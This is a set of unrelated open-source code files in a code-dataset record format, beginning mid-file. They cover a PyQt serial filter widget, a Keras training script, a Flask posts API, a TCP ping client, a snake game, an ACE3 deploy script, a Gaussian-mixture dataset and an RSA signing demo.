Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print (message)\n return\n \n self.serialHandle.write(b'\\x98')\n time.sleep(0.00001) # We need to sleep because of the OS-hardware-buffer\n for bytesToSend in byteList:\n print(bytesToSend)\n self.serialHandle.write(bytesToSend)\n time.sleep(0.00001) # We need to sleep because of the OS-hardware-buffer\n self.serialHandle.write(b'\\xff')\n self.serialHandle.write(b'\\xff')\n self.serialHandle.close()\n \n ## Check whether the first checkbox was checked and then update the entire ID table to either checked or unchecked state\n # @param checkBox a checkBox we perform the query on \n def filterAllIDs(self,checkBox):\n if self.layoutingComplete == True:\n if checkBox.column() == 1 and checkBox.row() == 0: # We clicked the toggle ID checkbox\n if checkBox.checkState() == Qt.Checked:\n rowCnt = self.filterTable.rowCount()\n for rows in range(0,rowCnt):\n try:\n self.filterTable.item(rows, 1).setCheckState(Qt.Checked)\n except AttributeError:\n print('no items after' + str(rows)+ 'found...Maybe this column has less items than'+str(rowCnt)+'?') \n elif checkBox.checkState() == Qt.Unchecked:\n rowCnt = self.filterTable.rowCount()\n for rows in range (0,rowCnt):\n try:\n self.filterTable.item(rows, 1).setCheckState(Qt.Unchecked)\n except AttributeError:\n print('no items after' + str(rows)+ 'found...Maybe this column has less items than'+str(rowCnt)+'?') \n else:\n print('neither checked nor unchecked...should never be here..')\n elif checkBox.column() == 3 and checkBox.row() == 0: # We clicked the toggle Message checkbox\n if checkBox.checkState() == Qt.Checked:\n rowCnt = self.filterTable.rowCount()\n for rows in range(0,rowCnt):\n try:\n self.filterTable.item(rows, 3).setCheckState(Qt.Checked)\n except AttributeError:\n print('no items after' + str(rows)+ 'found...Maybe this column has less items than'+str(rowCnt)+'?') \n elif checkBox.checkState() == Qt.Unchecked:\n rowCnt = self.filterTable.rowCount()\n for rows in range (0,rowCnt):\n try:\n self.filterTable.item(rows, 3).setCheckState(Qt.Unchecked)\n except AttributeError:\n print('no items after' + str(rows)+ 'found...Maybe this column has less items than'+str(rowCnt)+'?') \n else:\n print('neither checked nor unchecked...should never be here..')\n \n # --- HELPER FUNCTIONS --- #\n ## Create a defined checkbox within a tableWidgetItem to facilitate filling the table \n # @return the created checkbox \n def createCheckBox(self):\n myCheck = QTableWidgetItem()\n myCheck.setFlags(Qt.ItemIsUserCheckable | Qt.ItemIsEnabled)\n myCheck.setCheckState(Qt.Checked)\n return myCheck \n \n ## Create a defined font (bold,underlined) to facilitate filling the table\n # @return the created font \n def getFont(self):\n font = QFont()\n font.setBold(True) \n font.setUnderline(True) \n return font ","repo_name":"Penlane/Tracesniffer-GUI","sub_path":"Modules/HardwareFilterWidget.py","file_name":"HardwareFilterWidget.py","file_ext":"py","file_size_in_byte":9469,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"6"} +{"seq_id":"8834760378","text":"# bool: boolean values (True=1 or False=0)\n\ndef check_signal(signal: bool) -> bool:\n if signal == 1:\n return True\n elif signal == 0:\n return False\n\nif __name__ ==\"__main__\":\n\n turn_on: bool = 1\n turn_off: bool = 0\n\n # True sample.\n result: bool = check_signal(turn_on)\n print(\"Status: \", result)\n print(\"Type: \", type(result))\n\n # False sample.\n result = 
check_signal(turn_off)\n print(\"Status: \", result)\n print(\"Type: \", type(result))\n","repo_name":"drigols/studies","sub_path":"modules/python-codes/modules/type-hints/src/check_signal.py","file_name":"check_signal.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73304075068","text":"import argparse\nimport os\n\nimport numpy as np\nfrom imutils import paths\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelBinarizer\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n# 保存文件路径配置\nfrom projectconfig import pathconfig\n# 图像预处理\nfrom pyimagesearch.datasets import SimpleDatasetLoader as SDL\nfrom pyimagesearch.nn.conv import BinaryNet as BinNet\nfrom pyimagesearch.preprocessing import AspectAwarePreprocessor as AAP\nfrom pyimagesearch.preprocessing import ImageToArrayPreprocessor as IAP\n# GPU 初始化\nfrom tfsettings.gpu import InitGpu\n# 回调函数\nfrom tfsettings.traincallbacks import modelcheckpoint as TF_CB_chcekpoint\nfrom tfsettings.traincallbacks import tensorboard as TF_CB_tensorboard\n# 绘制训练结果\nfrom utils.trainplot import plot as my_plot_tool\n\nap = argparse.ArgumentParser() # 从命令中读取参数\nap.add_argument('-d', '--train_dataset', required=True, help='path to train dataset')\nap.add_argument('-e', '--epochs', required=True, help='training epochs number')\nap.add_argument('-t', '--test_dataset', required=True, help='path to test dataset')\nargs = vars(ap.parse_args())\n\nprint('[INFO] initing gpu.....')\ngpu = InitGpu.InitGpu()\ngpu.init()\n\nprint(\"[INFO] loading train images...\") # 预处理图片\nimagePaths = [x for x in list(paths.list_images(args['train_dataset'])) if x.split(os.path.sep)[-2] != 'jpg']\nclassNames = [pt.split(os.path.sep)[-2] for pt in imagePaths]\nclassNames = [str(x) for x in np.unique(classNames)]\n\naap = AAP.AspectAwarePreprocesser(64, 64) # 重设大小\niap = IAP.ImageToArrayPreprocess() # 转换成张量\n\nsdl = SDL.SimpleDatasetLoader(preprocessors=[aap, iap])\n(train_data, train_labels) = sdl.load(imagePaths, verbose=500)\ntrain_data = train_data.astype('float') / 255.0\n\n(trainX, validX, trainY, validY) = train_test_split(train_data, train_labels, test_size=0.30, random_state=43)\n\ntrainY = LabelBinarizer().fit_transform(trainY)\nvalidY = LabelBinarizer().fit_transform(validY)\n\n# construct the image generator for data augmentation 数据增强\naug = ImageDataGenerator(rotation_range=30, width_shift_range=0.1,\n height_shift_range=0.1, shear_range=0.2, zoom_range=0.2,\n horizontal_flip=True, fill_mode=\"nearest\")\n\n# initialize the optimizer and model\nprint(\"[INFO] compiling model...\")\n# opt = SGD(lr=0.05)\nopt = 'adam'\nbatch_size = 128\nmodel = BinNet.BinaryNet.build(width=64, height=64, depth=3)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=opt,\n metrics=[\"accuracy\"])\n\nprint(\"[INFO] training network...\")\nepochs = int(args['epochs'])\nconfig_path = pathconfig.PathConfig() # 实例化对象\nconfig_path.set_root_path(new_root_path='results/results03') # 设置训练结果保存路径\n\n# 构建回调函数\n# 生成 tersorborad log 文件\ncb_tensorboard = TF_CB_tensorboard.TensorBoardCallBack()\ncb_tensorboard.set_log_path(config_path.get_tensorboard_path())\n# 保存 cp 文件\ncb_chcekpoint = TF_CB_chcekpoint.ModelCheckpointCallBack()\ncb_chcekpoint.set_checkpoint_path(config_path.get_checkpoint_path())\n\nH = model.fit(aug.flow(trainX, trainY, batch_size=batch_size),\n validation_data=(validX, validY), steps_per_epoch=len(trainX) // 
batch_size,\n epochs=epochs, verbose=1,\n callbacks=[cb_tensorboard.build_cb(), cb_chcekpoint.build_cb()])\n# 保存模型\nmodel.save(filepath=config_path.get_model_save_path())\n\n# evaluate the network\nfrom utils.testplot.plot import ConfusionMatrix\n\nconfusion_matrix = ConfusionMatrix()\nconfusion_matrix = confusion_matrix.begin(args['test_dataset'], model=model, batch_size=batch_size)\n\n# 绘制结果\nmy_plot_tool.plot_train_loss_and_acc(epochs=epochs, H=H)\n","repo_name":"expoli/My-CNN-frame-example","sub_path":"BinaryNet_data_aug.py","file_name":"BinaryNet_data_aug.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26128517515","text":"\nclass Jogo:\n\n def __init__(self,nome):\n self.nome = nome\n\n def __str__(self):\n return self.nome\n \nnbajam= Jogo('Nbajam')\nprint(nbajam)\n\ntopgear = Jogo('Topgear')\nprint(topgear)\n\nclass TipoJogo:\n def __init__(self,tipo):\n self.tipo = tipo\n def __str__(self):\n return self.tipo\n\nação= TipoJogo('Ação')\nprint(ação)\n\naventura= TipoJogo('Aventura')\nprint(aventura)\n\nestratégia= TipoJogo('Estratégia')\nprint(estratégia)\n\ncorrida= TipoJogo('Corrida')\nprint(corrida)\n\nesporte= TipoJogo('Esporte')\nprint(esporte)\n","repo_name":"RogerioAguilera/tdd-python","sub_path":"codigo/jogo.py","file_name":"jogo.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"9936807764","text":"#definicion de la clase\nclass Usuario:\n \n def __init__(self, nombre, edad, profesion):\n self.nombre = nombre\n self.edad = edad\n self.profesion = profesion\n self.especie = 'humano'\n def imprimirNombre(self):\n print(self.nombre)\n \nusuario1 = Usuario('kender', 24, 'programador') #instancia de la clase\n#ejemlos\nusuario1.imprimirNombre()\nprint(usuario1.especie, usuario1.edad, usuario1.profesion)\n","repo_name":"kenderperez/pythonCookBook","sub_path":"sep2022/clases.py","file_name":"clases.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"3099973701","text":"import random\nfrom traceback import print_tb\n\na = []\n\nwhile len(a) <= 3:\n i = random.randrange(10, 20)\n a.append(i)\n if len(a) > 3:\n print('4가지 수: ', a)\n break\n\naverage = sum(a)/4\nprint('평균: ', average)\n\nprint('Big') if average >= 15 else print('Small')","repo_name":"yunzookim/beatcodingpy","sub_path":"162.py","file_name":"162.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4214550881","text":"from flask import jsonify, request\n\nfrom app.api import api\nfrom app.repositories import current_repo\nfrom app.core.request_objects.post import (\n PostListRequestObject,\n PostItemRequestObject,\n PostCreateRequestObject,\n)\nfrom app.core.use_cases import PostListUseCase, PostItemUseCase, PostCreateUseCase\nfrom app.serializers import PostSchema\n\n\n@api.route(\"/v1/posts\", methods=[\"GET\"])\ndef post_list():\n \"\"\"\n Post 목록\n ---\n tags:\n - post\n responses:\n 200:\n description: \"Success\"\n schema:\n type: \"array\"\n items:\n $ref: \"#/definitions/Post\"\n \"\"\"\n\n req = PostListRequestObject()\n uc = PostListUseCase(repo=current_repo)\n resp = uc.execute(req)\n\n if resp:\n schema = PostSchema(many=True, exclude=(\"comments\",))\n posts = schema.dump(resp.value).data\n return 
jsonify(posts)\n else:\n return jsonify({}), 400\n\n\n@api.route(\"/v1/posts\", methods=[\"POST\"])\ndef post_create():\n \"\"\"\n 새로운 Post 등록\n ---\n tags:\n - post\n parameters:\n - in: \"body\"\n name: \"body\"\n description: \"Pet object that needs to be added to the store\"\n required: true\n schema:\n $ref: \"#/definitions/PostInput\"\n responses:\n 201:\n description: \"생성됨\"\n 403:\n description: \"권한 없음\"\n 405:\n description: \"Invalid input\"\n \"\"\"\n payload = request.get_json()\n req = PostCreateRequestObject.from_dict(\n {\"title\": payload.get(\"title\"), \"body\": payload.get(\"body\")}\n )\n uc = PostCreateUseCase(repo=current_repo)\n resp = uc.execute(req)\n\n if resp:\n schema = PostSchema()\n post = schema.dump(resp.value).data\n return jsonify(post)\n else:\n return jsonify({}), 500\n\n\n@api.route(\"/v1/posts/\", methods=[\"GET\"])\ndef post_item(post_id):\n \"\"\"\n Post 조회\n ---\n tags:\n - post\n parameters:\n - in: \"path\"\n name: \"post_id\"\n description: \"게시물 번호\"\n required: true\n type: \"integer\"\n responses:\n 200:\n description: \"성공\"\n schema:\n $ref: \"#/definitions/Post\"\n 403:\n description: \"게시물 조회 권한이 없음\"\n 404:\n description: \"게시물이 존재하지 않음\"\n \"\"\"\n\n req = PostItemRequestObject.from_dict({\"id\": int(post_id)})\n uc = PostItemUseCase(repo=current_repo)\n resp = uc.execute(req)\n\n if resp:\n schema = PostSchema()\n post = schema.dump(resp.value).data\n return jsonify(post)\n elif resp.type == \"NotFoundError\":\n return jsonify({}), 404\n else:\n return jsonify({}), 500\n\n\n@api.route(\"/v1/posts/\", methods=[\"PUT\"])\ndef post_update(post_id):\n \"\"\"\n Post 수정\n ---\n tags:\n - post\n parameters:\n - in: \"body\"\n name: \"body\"\n description: \"Pet object that needs to be added to the store\"\n required: true\n schema:\n $ref: \"#/definitions/Post\"\n responses:\n 405:\n description: \"Invalid input\"\n \"\"\"\n return {}\n\n\n@api.route(\"/v1/posts/\", methods=[\"DELETE\"])\ndef post_delete(post_id):\n \"\"\"\n Post 삭제\n ---\n tags:\n - post\n parameters:\n - in: \"body\"\n name: \"body\"\n description: \"Pet object that needs to be added to the store\"\n required: true\n schema:\n $ref: \"#/definitions/Post\"\n responses:\n 405:\n description: \"Invalid input\"\n \"\"\"\n return {}\n","repo_name":"yoophi/sample-posts-api","sub_path":"app/api/posts.py","file_name":"posts.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42607040571","text":"import time\nfrom socket import *\nserverName = '127.0.0.1' # 主机\nserverPort = 12000\n# 创建Socket时,AF_INET指定使用IPv4协议,如果要用更先进的IPv6,就指定为AF_INET6\n# SOCK_DGRAM指定了这个Socket的类型是UDP\n# SOCK_STREAM指定使用面向流的TCP协议\nclientSocket = socket(AF_INET, SOCK_STREAM)\nclientSocket.connect((serverName,serverPort))\nclientSocket.settimeout(1) # 设置超时时间为1s\nfor i in range(0, 10):\n oldTime = time.time()\n sendTime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(oldTime))\n # encode()把str转成bytes\n message = ('package %d,client_local_time:%s' % (i + 1, sendTime)).encode()\n try:\n # 发送数据\n clientSocket.send(message)\n # UDP的 recvfrom() 和 TCP 的recv()不一样,具体可以看 TCP Ping项目\n modifiedMessage = clientSocket.recv(1024)\n # 计算往返时间\n rtt = time.time() - oldTime\n # decode 把bytes转成str\n modifiedMessage = modifiedMessage.decode(\"utf-8\")\n print('报文 %d 收到来自 %s 的应答: %s,往返时延(RTT) = %fs' % (i+1, serverName,modifiedMessage, rtt))\n except Exception as e:\n print('报文 %d: 的请求超时' % (i+1)) # 
处理异常\n\n","repo_name":"inspurer/ComputerNetwork","sub_path":"《计算机网络自顶向下方法》课后编程作业题解/第二章(应用层)/扩展1:TCP ping程序/TCPPingClient.py","file_name":"TCPPingClient.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"zh","doc_type":"code","stars":17,"dataset":"github-code","pt":"6"} +{"seq_id":"43779791916","text":"import pygame\nimport sys\nimport math\nfrom random import choice\nPURPLE = (255, 0, 255)\nRED = (255, 0, 0)\nBLACK = (0, 0, 0)\nsize = 500\n\n# Set screen size and init pygame\nclock = pygame.time.Clock()\nscreen = pygame.display.set_mode([size, size])\npygame.init()\n\n# Segment is a block of the Snake\n# The snake is constructed of these segments\n\n\nclass Segment:\n def __init__(self, x, y, width=10, colour=PURPLE):\n self.x, self.y = x, y\n self.width = width\n self.colour = colour\n\n\n# Draw the segment at the specified coordinates\n# Segments are squares with dimensions of width*width\n\n def segment_draw(self):\n pygame.draw.rect(screen, self.colour, (self.x, self.y, self.width,\n self.width), 0)\n\n\n# Food is the objective that snake is meant to reach\n# Food will cause the snake to grow and score to increase\nclass Food:\n def __init__(self, colour=RED, x=0, y=0, width=10, size=500):\n self.x, self.y = x, y\n self.width = width\n self.size = size\n self.colour = colour\n\n# Update coordinates after the food has been eaten\n def food_new(self):\n self.x = choice(range(10, self.size, self.width))\n self.y = choice(range(10, self.size, self.width))\n\n\n# Draw the food at the specified coordinates\n# Food is a square of width*width dimension\n def food_draw(self, screen):\n pygame.draw.rect(screen, self.colour, (self.x, self.y,\n self.width, self.width), 0)\n\n\n# Snake class\n# Length controls starting number of segments\n# self.segments is used to store the segments of the snake\n# xVel and yVel are velocities used to determine snake movement\n# direction is a label of the current direction of the snake\nclass Snake:\n def __init__(self, length=5, size=500):\n self.initial_length = length\n self.length = length\n self.segments = []\n self.x, self.y = size//2, size//2\n self.xVel, self.yVel = 0, 0\n for i in range(length):\n self.segments.append(Segment(self.x, self.y))\n self.x += self.segments[i].width\n\n# Function to move the snake\n# Tail is popped and new head is drawn\n def snake_move(self):\n self.x += self.xVel\n self.y += self.yVel\n self.segments.insert(0, Segment(self.x, self.y))\n self.segments.pop()\n\n# Function to add a new segment to the snake\n# Draws a head in the place of the eaten food\n def snake_grow(self):\n self.x += self.xVel\n self.y += self.yVel\n self.segments.insert(0, Segment(self.x, self.y))\n self.segments.pop()\n\n def snake_reset(self, length=5, size=500):\n self.initial_length = length\n self.length = length\n self.segments = []\n self.x, self.y = size // 2, size // 2\n self.xVel, self.yVel = -10, 0\n for i in range(length):\n self.segments.append(Segment(self.x, self.y))\n self.x += self.segments[i].width\n\n # Function to create the snake\n\n def snake_draw(self):\n for i in range(len(self.segments)):\n self.segments[i].segment_draw()\n self.length = len(self.segments)\n","repo_name":"Lena-MJL/PySnakeAI","sub_path":"game_objects.py","file_name":"game_objects.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21648042831","text":"from google.cloud import datacatalog_v1beta1\n\nfrom datacatalog_tag_template_processor 
import constant\n\n\nclass DataCatalogEntityFactory:\n __TRUTHS = {1, '1', 't', 'T', 'true', 'True', 'TRUE'}\n\n @classmethod\n def make_tag_template(cls, tag_template_dict):\n tag_template = datacatalog_v1beta1.types.TagTemplate()\n\n tag_template.display_name = tag_template_dict['display_name']\n\n fields = tag_template_dict['fields']\n\n field_order = len(fields)\n for field_id, items in fields.items():\n field_display_name = items['field_display_name']\n field_type = items['field_type']\n\n tag_template.fields[field_id].display_name = field_display_name\n\n field_type = field_type.upper()\n\n if field_type in constant.ALLOWED_BOOL_VALUES:\n tag_template.fields[field_id].type.primitive_type = \\\n datacatalog_v1beta1.enums.FieldType.PrimitiveType.BOOL.value\n elif field_type in constant.ALLOWED_DOUBLE_VALUES:\n tag_template.fields[field_id].type.primitive_type = \\\n datacatalog_v1beta1.enums.FieldType.PrimitiveType.DOUBLE.value\n elif field_type in constant.ALLOWED_STRING_VALUES:\n tag_template.fields[field_id].type.primitive_type = \\\n datacatalog_v1beta1.enums.FieldType.PrimitiveType.STRING.value\n elif field_type in constant.ALLOWED_DATETIME_VALUES:\n tag_template.fields[field_id].type.primitive_type = \\\n datacatalog_v1beta1.enums.FieldType.PrimitiveType.TIMESTAMP.value\n elif field_type in constant.ALLOWED_ENUM_VALUES:\n enum_values = items['enum_values']\n for enum_value in enum_values:\n tag_template.fields[field_id].type.enum_type \\\n .allowed_values.add().display_name = enum_value\n\n tag_template.fields[field_id].order = field_order\n field_order -= 1\n\n return tag_template\n","repo_name":"mesmacosta/datacatalog-tag-template-processor","sub_path":"src/datacatalog_tag_template_processor/datacatalog_entity_factory.py","file_name":"datacatalog_entity_factory.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"26551813229","text":"#!/usr/bin/env python3\n\n####################################\n# ACE3 automatic deployment script #\n# ================================ #\n# This is not meant to be run #\n# directly!! 
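# Context (hence the warning above): this script is intended to be run from
# automation rather than by hand. It regenerates the stringtable translation
# report with tools/stringtablediag.py and rewrites the body of the pinned
# translation issue (#367) on acemod/ACE3, using a GitHub token read from the
# GH_TOKEN environment variable.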
#\n####################################\n\nimport os\nimport sys\nimport traceback\nimport subprocess as sp\nfrom github import Github\n\n\nTRANSLATIONISSUE = 367\nTRANSLATIONBODY = \"\"\"**[ACE3 Translation Guide](http://ace3.acemod.org/wiki/development/how-to-translate-ace3.html)**\n\n{}\n\"\"\"\n\nREPOUSER = \"acemod\"\nREPONAME = \"ACE3\"\nREPOPATH = \"{}/{}\".format(REPOUSER, REPONAME)\n\nBRANCH = \"master\"\n\n\ndef update_translations(repo):\n diag = sp.check_output([\"python3\", \"tools/stringtablediag.py\", \"--markdown\"])\n diag = str(diag, \"utf-8\")\n issue = repo.get_issue(TRANSLATIONISSUE)\n issue.edit(body=TRANSLATIONBODY.format(diag))\n\n\ndef main():\n print(\"Obtaining token ...\")\n try:\n token = os.environ[\"GH_TOKEN\"]\n repo = Github(token).get_repo(REPOPATH)\n except:\n print(\"Could not obtain token.\")\n print(traceback.format_exc())\n return 1\n else:\n print(\"Token sucessfully obtained.\")\n\n print(\"\\nUpdating translation issue ...\")\n try:\n update_translations(repo)\n except:\n print(\"Failed to update translation issue.\")\n print(traceback.format_exc())\n return 1\n else:\n print(\"Translation issue successfully updated.\")\n\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"acemod/ACE3","sub_path":"tools/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":966,"dataset":"github-code","pt":"6"} +{"seq_id":"40966565700","text":"\n# Steve's adaptation of VEEGAN example:\n# https://github.com/akashgit/VEEGAN/blob/master/VEEGAN_2D_RING.ipynb\n# to TensorFlow 2 + Keras, with the TensorFlow Probabilities library:\n# https://blog.tensorflow.org/2019/03/variational-autoencoders-with.html\n#\n# Stephen Sinclair \n\nimport matplotlib as mpl\nmpl.use('Agg')\n# mpl.rcParams['font.family'] = 'serif'\n# mpl.rcParams['font.serif'] = ['cmr10']\n# mpl.font_manager.findfont('cmmr')\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom itertools import product\nimport sys, os\n\ndists = tfp.distributions\n\n# Generate 2D grid\n\nmus = np.array([np.array([i, j]) for i, j in product(range(-4, 5, 2),\n range(-4, 5, 2))],\n dtype=np.float32)\n# mus = np.array([np.array([i, j]) for i, j in product(range(-1, 1, 1),\n# range(-1, 1, 1))],\n# dtype=np.float32)\n\nclass Dataset(object):\n def __init__(self, params):\n self.params = params\n\n def latent_generator(self, batch_size):\n if self.params['latent_prior']=='uniform':\n while True:\n yield tf.random.uniform([batch_size, self.params['latent_dim']])\n elif self.params['latent_prior']=='normal':\n while True:\n yield tf.random.normal([batch_size, self.params['latent_dim']])\n else:\n assert False and 'Unknown latent prior.'\n\n def data_generator(self, batch_size):\n while True:\n yield self.normal_mixture([batch_size, self.params['data_dim']])\n\n def eps_generator(self, batch_size, dims):\n while True:\n yield tf.random.normal([batch_size, dims])\n\n def normal_mixture(self, shape, **kwargs):\n return self.create_distribution(shape[0],25,shape[1],**kwargs)\n\n @tf.function\n def create_distribution(self, batch_size, num_components=25,\n num_features=2,**kwargs):\n num_components = len(mus)\n cat = dists.Categorical(tf.zeros(num_components, dtype=np.float32))\n\n s = 0.05\n sigmas = [np.array([s,s]).astype(np.float32) for i in range(num_components)]\n components = list((dists.MultivariateNormalDiag(mu, sigma) \n for (mu, sigma) in zip(mus, 
sigmas)))\n data = dists.Mixture(cat, components)\n return data.sample(batch_size)\n\n # Network definitions\n def normal_mixture(self, shape, **kwargs):\n return self.create_distribution(shape[0],25,shape[1],**kwargs)\n\n # Visualization\n def init_viz(self, dirname, method, variant, x_input, z_input, eps_input):\n self.dirname = dirname\n self.method = method\n self.variant = variant\n self.fig, (self.ax,self.ax2,self.ax3) = plt.subplots(1,3, num=1, figsize=(9,4))\n self.lims = None\n self.frame = 0\n self.x_input_viz = x_input\n self.eps_input_viz = eps_input\n self.z_input_viz = z_input\n # TODO abstract the possibility of a pre-clustered input distribution\n N = tf.shape(self.z_input_viz)[0]\n self.x_input_viz = np.array(\n [np.hstack([tf.random.normal([N,1], mean=m[0], stddev=0.05),\n tf.random.normal([N,1], mean=m[1], stddev=0.05)])\n for m in mus])\n self.eps_input_viz = next(self.eps_generator(500, 1))\n self.z_input_viz = next(self.latent_generator(500))\n\n self.x_scat = self.ax.scatter([0],[0], label='target', marker='.', alpha=0.05, edgecolors='none')\n self.px_scat = self.ax.scatter([0],[0], label='generated', marker='.', alpha=0.2, edgecolors='none')\n if not os.path.exists(self.dirname):\n os.mkdir(self.dirname)\n plt.subplots_adjust()\n\n def viz(self, epoch, decoder, encoder):\n continue_seed = int(tf.random.uniform([1])*65536)\n tf.random.set_seed(2)\n N = self.x_input_viz.shape[1]\n D = self.x_input_viz.shape[2]\n x_output = decoder([self.z_input_viz,self.eps_input_viz])\n xl_ = np.array([np.minimum(np.min(self.x_input_viz[:,:,0]),np.min(x_output[:,0])),\n np.maximum(np.max(self.x_input_viz[:,:,0]),np.max(x_output[:,0]))])\n yl_ = np.array([np.minimum(np.min(self.x_input_viz[:,:,1]),np.min(x_output[:,1])),\n np.maximum(np.max(self.x_input_viz[:,:,1]),np.max(x_output[:,1]))])\n if self.lims is None:\n self.lims = np.hstack([xl_, yl_])\n else:\n self.lims[0] = self.lims[0]*0.95+xl_[0]*0.05\n self.lims[1] = self.lims[1]*0.95+xl_[1]*0.05\n self.lims[2] = self.lims[2]*0.95+yl_[0]*0.05\n self.lims[3] = self.lims[3]*0.95+yl_[1]*0.05\n self.ax.set_xlim(self.lims[:2]); self.ax.set_ylim(self.lims[2:4])\n self.x_scat.set_offsets(tf.reshape(self.x_input_viz,(len(mus)*N,D))[:,:2])\n self.px_scat.set_offsets(x_output[:,:2])\n f = self.ax.set_title('decoded', fontname='cmr10')\n #ax.legend(loc=1, prop=f.get_fontproperties())\n self.ax2.clear()\n self.ax3.clear()\n # ax2.scatter(self.z_input_viz[:,0], self.z_input_viz[:,1])\n for i,m in enumerate(mus):\n z_output = encoder(self.x_input_viz[i])\n self.ax2.scatter(z_output[:,0], z_output[:,1], marker='.', alpha=0.2, edgecolors='none')\n x_output = decoder([z_output,self.eps_input_viz[i:i+N]])\n self.ax3.scatter(x_output[:,0], x_output[:,1], marker='.', alpha=0.2, edgecolors='none')\n self.ax3.set_xlim(self.lims[:2]); self.ax3.set_ylim(self.lims[2:4])\n self.ax3.set_title('reconstruction', fontname='cmr10')\n if self.params['latent_prior']=='normal':\n self.ax2.plot(np.cos(np.linspace(0,2*np.pi,200))*1.96,\n np.sin(np.linspace(0,2*np.pi,200))*1.96, 'k--', alpha=0.4)\n self.ax2.set_xlim(-3,3)\n self.ax2.set_ylim(-3,3)\n elif self.params['latent_prior']=='uniform':\n self.ax2.plot([[0,1],[0,1],[0,0],[1,1]],\n [[0,0],[1,1],[0,1],[0,1]], 'k--', alpha=0.4)\n self.ax2.set_xlim(-0.5,1.5)\n self.ax2.set_ylim(-0.5,1.5)\n if self.z_input_viz.shape[1]==2:\n self.ax2.set_title('encoded', fontname='cmr10')\n else:\n self.ax2.set_title('encoded (first 2 dims)', fontname='cmr10')\n self.fig.suptitle(\n f'{self.z_input_viz.shape[1]}D {self.method} 
{self.variant} — Epoch {epoch}',\n fontname='cmr10')\n # fig.canvas.draw()\n # plt.pause(0.0001)\n self.fig.savefig('now.png')\n self.fig.savefig(f'{self.dirname}/frame{self.frame:06d}.png')\n self.frame += 1\n tf.random.set_seed(continue_seed)\n\nif __name__=='__main__':\n d = Dataset({'latent_prior':'normal', 'data_dim': 2, 'latent_dim': 2})\n x = next(d.data_generator(200))\n z = next(d.latent_generator(200))\n e = next(d.eps_generator(200,1))\n d.init_viz('testviz', 'testmethod', 'testvariant', x, z, e)\n d.viz(0, lambda z: x, lambda x: z)\n","repo_name":"radarsat1/latentspace","sub_path":"datasets/multimodal_gaussian_2d.py","file_name":"multimodal_gaussian_2d.py","file_ext":"py","file_size_in_byte":7143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"6340366417","text":"\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import padding\n#generating private key using rsa \n#make function to sign the message \n#make a verification function => uses pu , sign , message\ndef gneratekeys():\n private_key = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048,\n ) \n\n public_key = private_key.public_key()\n return private_key,public_key\n\ndef sign(message,private_key):\n message=bytes(message,'utf-8')\n signature = private_key.sign(\n message,\n padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH\n ),\n hashes.SHA256()\n )\n return signature\n\ndef verify(signature,message,public_key):\n\n try:\n message=bytes(message,'utf-8')\n public_key.verify(\n signature,\n message,\n padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH\n ),\n hashes.SHA256()\n )\n print(\"The message is Verified \")\n except:\n print(\"The message does no match\")\n \nif __name__==\"__main__\":\n pr,pu=gneratekeys()\n # print(pr,pu)\n message=\"Think of this message as a transaction message\"\n incorrectMessage = \"this is not the correct meesage\"\n signature =sign(message,pr)\n verify(signature,message,pu)\n \n","repo_name":"swarupyeole11/BlockchainCryptography","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"7268701558","text":"from PyQt5.QtCore import (Qt, QSize, QRectF)\nfrom PyQt5.QtGui import (QPainter, QColor, QFont)\nfrom PyQt5.QtWidgets import (QWidget, QSizePolicy, QDialog, QTableWidget,\n QTableWidgetItem, QTabWidget, QHBoxLayout,\n QGridLayout, QHeaderView,\n QApplication)\n\nimport Nuclide\n\nGREEK_DICT = {'a':'\\u03B1', 'b':'\\u03B2', \"EC\":'\\u03B5'}\nKEV_TO_MASS = 931494.\n\n\n'''上端块'''\nclass BlockWidgetNuclide(QWidget):\n\n XMARGIN = 400.0\n YMARGIN = 100.0\n\n def __init__(self, nuclide, parent=None):\n super(BlockWidgetNuclide, self).__init__(parent)\n\n self.nuclide = nuclide\n # 固定大小\n self.setFixedSize(QSize(BlockWidgetNuclide.XMARGIN, BlockWidgetNuclide.YMARGIN))\n\n def 